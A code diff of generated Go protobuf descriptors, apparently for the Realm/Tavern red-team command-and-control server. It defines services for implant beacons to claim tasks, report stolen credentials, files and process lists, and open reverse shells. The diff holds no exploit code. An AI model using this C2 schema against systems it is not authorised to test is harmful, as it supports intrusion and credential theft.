+ - "\x05tasks\x18\x01 \x03(\v2\b.c2.TaskR\x05tasks\x12.\n" + - "\vshell_tasks\x18\x02 \x03(\v2\r.c2.ShellTaskR\n" + - "shellTasks\"R\n" + - "\x11FetchAssetRequest\x12\x12\n" + - "\x04name\x18\x01 \x01(\tR\x04name\x12)\n" + - "\acontext\x18\x02 \x01(\v2\x0f.c2.TaskContextR\acontext\"*\n" + - "\x12FetchAssetResponse\x12\x14\n" + - "\x05chunk\x18\x01 \x01(\fR\x05chunk\"z\n" + - "\x17ReportCredentialRequest\x12)\n" + - "\acontext\x18\x01 \x01(\v2\x0f.c2.TaskContextR\acontext\x124\n" + - "\n" + - "credential\x18\x02 \x01(\v2\x14.eldritch.CredentialR\n" + - "credential\"\x1a\n" + - "\x18ReportCredentialResponse\"d\n" + - "\x11ReportFileRequest\x12)\n" + - "\acontext\x18\x01 \x01(\v2\x0f.c2.TaskContextR\acontext\x12$\n" + - "\x05chunk\x18\x02 \x01(\v2\x0e.eldritch.FileR\x05chunk\"\x14\n" + - "\x12ReportFileResponse\"p\n" + - "\x18ReportProcessListRequest\x12)\n" + - "\acontext\x18\x01 \x01(\v2\x0f.c2.TaskContextR\acontext\x12)\n" + - "\x04list\x18\x02 \x01(\v2\x15.eldritch.ProcessListR\x04list\"\x1b\n" + - "\x19ReportProcessListResponse\"\xad\x01\n" + - "\x17ReportTaskOutputRequest\x12&\n" + - "\x06output\x18\x01 \x01(\v2\x0e.c2.TaskOutputR\x06output\x12)\n" + - "\acontext\x18\x02 \x01(\v2\x0f.c2.TaskContextR\acontext\x12?\n" + - "\x11shell_task_output\x18\x03 \x01(\v2\x13.c2.ShellTaskOutputR\x0fshellTaskOutput\"\x1a\n" + - "\x18ReportTaskOutputResponse\"\x85\x01\n" + - "\x13ReverseShellRequest\x12/\n" + - "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + - "\x04data\x18\x02 \x01(\fR\x04data\x12)\n" + - "\acontext\x18\x03 \x01(\v2\x0f.c2.TaskContextR\acontext\"[\n" + - "\x14ReverseShellResponse\x12/\n" + - "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + - "\x04data\x18\x02 \x01(\fR\x04data\"b\n" + - "\x13CreatePortalRequest\x12)\n" + - "\acontext\x18\x01 \x01(\v2\x0f.c2.TaskContextR\acontext\x12 \n" + - "\x04mote\x18\x02 \x01(\v2\f.portal.MoteR\x04mote\"8\n" + - "\x14CreatePortalResponse\x12 \n" + - "\x04mote\x18\x02 \x01(\v2\f.portal.MoteR\x04mote*\x8f\x01\n" + - "\x17ReverseShellMessageKind\x12*\n" + - "&REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED\x10\x00\x12#\n" + - "\x1fREVERSE_SHELL_MESSAGE_KIND_DATA\x10\x01\x12#\n" + - "\x1fREVERSE_SHELL_MESSAGE_KIND_PING\x10\x022\xc5\x04\n" + - "\x02C2\x12=\n" + - "\n" + - "ClaimTasks\x12\x15.c2.ClaimTasksRequest\x1a\x16.c2.ClaimTasksResponse\"\x00\x12=\n" + - "\n" + - "FetchAsset\x12\x15.c2.FetchAssetRequest\x1a\x16.c2.FetchAssetResponse0\x01\x12M\n" + - "\x10ReportCredential\x12\x1b.c2.ReportCredentialRequest\x1a\x1c.c2.ReportCredentialResponse\x12=\n" + - "\n" + - "ReportFile\x12\x15.c2.ReportFileRequest\x1a\x16.c2.ReportFileResponse(\x01\x12P\n" + - "\x11ReportProcessList\x12\x1c.c2.ReportProcessListRequest\x1a\x1d.c2.ReportProcessListResponse\x12O\n" + - "\x10ReportTaskOutput\x12\x1b.c2.ReportTaskOutputRequest\x1a\x1c.c2.ReportTaskOutputResponse\"\x00\x12G\n" + - "\fReverseShell\x12\x17.c2.ReverseShellRequest\x1a\x18.c2.ReverseShellResponse\"\x00(\x010\x01\x12G\n" + - "\fCreatePortal\x12\x17.c2.CreatePortalRequest\x1a\x18.c2.CreatePortalResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/internal/c2/c2pbb\x06proto3" +var file_c2_proto_rawDesc = string([]byte{ + 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, + 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, + 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, + 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, + 0x0c, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, 0x27, 0x0a, + 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, + 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, + 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xee, 0x01, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x6e, 0x73, + 0x70, 0x6f, 0x72, 0x74, 0x12, 0x10, 0x0a, 0x03, 0x75, 0x72, 0x69, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x03, 0x75, 0x72, 0x69, 0x12, 0x1a, 0x0a, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, + 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, 0x08, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x76, + 0x61, 0x6c, 0x12, 0x26, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, + 0x32, 0x12, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x2e, + 0x54, 0x79, 0x70, 0x65, 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x65, 0x78, + 0x74, 0x72, 0x61, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x65, 0x78, 0x74, 0x72, 0x61, + 0x12, 0x16, 0x0a, 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, 0x72, 0x18, 0x05, 0x20, 0x01, 0x28, 0x02, + 0x52, 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, 0x72, 0x22, 0x5d, 0x0a, 0x04, 0x54, 0x79, 0x70, 0x65, + 0x12, 0x19, 0x0a, 0x15, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x55, 0x4e, + 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x54, + 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x47, 0x52, 0x50, 0x43, 0x10, 0x01, 0x12, + 0x13, 0x0a, 0x0f, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, 0x54, 0x5f, 0x48, 0x54, 0x54, + 0x50, 0x31, 0x10, 0x02, 0x12, 0x11, 0x0a, 0x0d, 0x54, 0x52, 0x41, 0x4e, 0x53, 0x50, 0x4f, 0x52, + 0x54, 0x5f, 0x44, 0x4e, 0x53, 0x10, 0x03, 0x22, 0x67, 0x0a, 0x13, 0x41, 0x76, 0x61, 0x69, 0x6c, + 0x61, 0x62, 0x6c, 0x65, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x12, 0x2d, + 0x0a, 0x0a, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x18, 0x01, 0x20, 0x03, + 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, + 0x74, 0x52, 0x0a, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x12, 0x21, 0x0a, + 0x0c, 0x61, 0x63, 0x74, 0x69, 0x76, 0x65, 0x5f, 0x69, 0x6e, 0x64, 0x65, 0x78, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x0d, 0x52, 0x0b, 0x61, 0x63, 0x74, 0x69, 0x76, 0x65, 0x49, 0x6e, 0x64, 0x65, 0x78, + 0x22, 0xd1, 0x01, 0x0a, 0x06, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x12, 0x1e, 0x0a, 0x0a, 0x69, + 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x1c, 0x0a, 0x09, 0x70, + 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, + 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x12, 0x1c, 0x0a, 0x04, 0x68, 0x6f, 0x73, + 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, + 0x74, 0x52, 0x04, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x1f, 0x0a, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, + 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x09, 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x67, 0x65, 0x6e, + 0x74, 0x52, 0x05, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x4a, 0x0a, 0x14, 0x61, 0x76, 0x61, 0x69, + 0x6c, 0x61, 0x62, 0x6c, 0x65, 0x5f, 0x74, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x73, + 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x41, 0x76, 0x61, 0x69, + 0x6c, 0x61, 0x62, 0x6c, 0x65, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x52, + 0x13, 0x61, 0x76, 0x61, 0x69, 0x6c, 0x61, 0x62, 0x6c, 0x65, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x70, + 0x6f, 0x72, 0x74, 0x73, 0x22, 0xfe, 0x01, 0x0a, 0x04, 0x48, 0x6f, 0x73, 0x74, 0x12, 0x1e, 0x0a, + 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x12, 0x12, 0x0a, + 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, + 0x65, 0x12, 0x2d, 0x0a, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x18, 0x03, 0x20, + 0x01, 0x28, 0x0e, 0x32, 0x11, 0x2e, 0x63, 0x32, 0x2e, 0x48, 0x6f, 0x73, 0x74, 0x2e, 0x50, 0x6c, + 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x52, 0x08, 0x70, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, + 0x12, 0x1d, 0x0a, 0x0a, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x5f, 0x69, 0x70, 0x18, 0x04, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6d, 0x61, 0x72, 0x79, 0x49, 0x70, 0x22, + 0x74, 0x0a, 0x08, 0x50, 0x6c, 0x61, 0x74, 0x66, 0x6f, 0x72, 0x6d, 0x12, 0x18, 0x0a, 0x14, 0x50, + 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, + 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x14, 0x0a, 0x10, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, + 0x4d, 0x5f, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, + 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, + 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, + 0x53, 0x10, 0x03, 0x12, 0x10, 0x0a, 0x0c, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, + 0x42, 0x53, 0x44, 0x10, 0x04, 0x22, 0x6b, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, + 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, + 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, + 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, + 0x65, 0x12, 0x1d, 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, + 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, + 0x12, 0x10, 0x0a, 0x03, 0x6a, 0x77, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6a, + 0x77, 0x74, 0x22, 0x9c, 0x01, 0x0a, 0x09, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, + 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, + 0x12, 0x14, 0x0a, 0x05, 0x69, 0x6e, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x05, 0x69, 0x6e, 0x70, 0x75, 0x74, 0x12, 0x19, 0x0a, 0x08, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, + 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x03, 0x52, 0x07, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x49, + 0x64, 0x12, 0x1f, 0x0a, 0x0b, 0x73, 0x65, 0x71, 0x75, 0x65, 0x6e, 0x63, 0x65, 0x5f, 0x69, 0x64, + 0x18, 0x04, 0x20, 0x01, 0x28, 0x04, 0x52, 0x0a, 0x73, 0x65, 0x71, 0x75, 0x65, 0x6e, 0x63, 0x65, + 0x49, 0x64, 0x12, 0x1b, 0x0a, 0x09, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d, 0x5f, 0x69, 0x64, 0x18, + 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d, 0x49, 0x64, 0x12, + 0x10, 0x0a, 0x03, 0x6a, 0x77, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6a, 0x77, + 0x74, 0x22, 0x1d, 0x0a, 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, + 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, + 0x22, 0xe3, 0x01, 0x0a, 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, + 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, + 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, + 0x45, 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, + 0x65, 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, + 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, + 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, + 0x70, 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, + 0x12, 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, + 0x64, 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, + 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, + 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, + 0x73, 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x22, 0x0a, 0x0e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, + 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe8, 0x01, 0x0a, 0x0f, 0x53, + 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, + 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, + 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, + 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, + 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, + 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, + 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, + 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, + 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, + 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, + 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, + 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, + 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, + 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x38, 0x0a, 0x0b, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, + 0x74, 0x65, 0x78, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x10, 0x0a, + 0x03, 0x6a, 0x77, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6a, 0x77, 0x74, 0x22, + 0x48, 0x0a, 0x10, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, + 0x65, 0x78, 0x74, 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, 0x73, + 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x0b, 0x73, 0x68, 0x65, 0x6c, + 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x6a, 0x77, 0x74, 0x18, 0x02, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6a, 0x77, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, + 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, + 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, + 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, + 0x6f, 0x6e, 0x22, 0x64, 0x0a, 0x12, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, + 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, + 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x2e, 0x0a, 0x0b, 0x73, 0x68, 0x65, 0x6c, + 0x6c, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x02, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x0d, 0x2e, + 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x0a, 0x73, 0x68, + 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x22, 0xae, 0x01, 0x0a, 0x11, 0x46, 0x65, 0x74, + 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x34, + 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x01, + 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, + 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x0b, 0x74, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, + 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, 0x0a, 0x12, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x5f, 0x74, 0x61, + 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, + 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, + 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x10, 0x73, 0x68, 0x65, 0x6c, 0x6c, 0x54, + 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, + 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x42, 0x09, + 0x0a, 0x07, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x22, 0x2a, 0x0a, 0x12, 0x46, 0x65, 0x74, + 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, + 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, + 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0xd6, 0x01, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, + 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, + 0x74, 0x12, 0x34, 0x0a, 0x0c, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, + 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0f, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, + 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x0b, 0x74, 0x61, 0x73, 0x6b, + 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x44, 0x0a, 0x12, 0x73, 0x68, 0x65, 0x6c, 0x6c, + 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x14, 0x2e, 0x63, 0x32, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x54, 0x61, + 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x48, 0x00, 0x52, 0x10, 0x73, 0x68, 0x65, + 0x6c, 0x6c, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x78, 0x74, 0x12, 0x34, 0x0a, + 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x18, 0x03, 0x20, 0x01, 0x28, + 0x0b, 0x32, 0x14, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 